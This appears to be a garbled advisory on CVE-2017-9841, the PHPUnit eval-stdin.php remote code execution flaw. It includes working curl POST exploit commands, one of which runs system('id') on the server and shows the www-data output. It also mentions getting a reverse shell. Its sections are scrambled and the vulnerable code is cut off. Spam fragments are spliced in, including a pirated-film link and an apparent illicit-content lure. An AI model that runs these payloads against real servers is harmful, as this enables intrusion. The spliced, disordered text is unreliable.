CVE IDs: CVE-2017-9841 (Primary), related to component usage. Affected Component: <phpunit>/src/Util/PHP/eval-stdin.php Severity: Critical (CVSS 9.8) Affected Versions: PHPUnit before 4.8.28 and 5.x before 5.6.3. 1. Executive Summary PHPUnit is a widely used testing framework for PHP. In older versions, it included a utility file named eval-stdin.php designed to facilitate test execution via standard input. This file was placed in the publicly accessible web root by default in many project structures (like Laravel, Symfony, or CodeIgniter). Cp T33n Txt Free Now
curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -d "<?php echo 'VULNERABLE'; ?>" If the response contains "VULNERABLE", the target is compromised. Download - Constantine -2005- Hindi Dubbed 108... Link
curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -d "<?php system('id'); ?>" Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Due to a lack of access control within the file itself, if the web server is configured to execute .php files and the vendor directory is publicly accessible, remote attackers can execute arbitrary PHP code on the server by sending a specially crafted HTTP POST request. The Vulnerable Code The vulnerability exists in the file vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php . The contents of the file in vulnerable versions are minimal and look roughly like this:
// ... license header ...
To achieve a reverse shell or system command execution:
<?php /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> */
Using curl , an attacker can verify the vulnerability by causing the server to execute the phpinfo() function: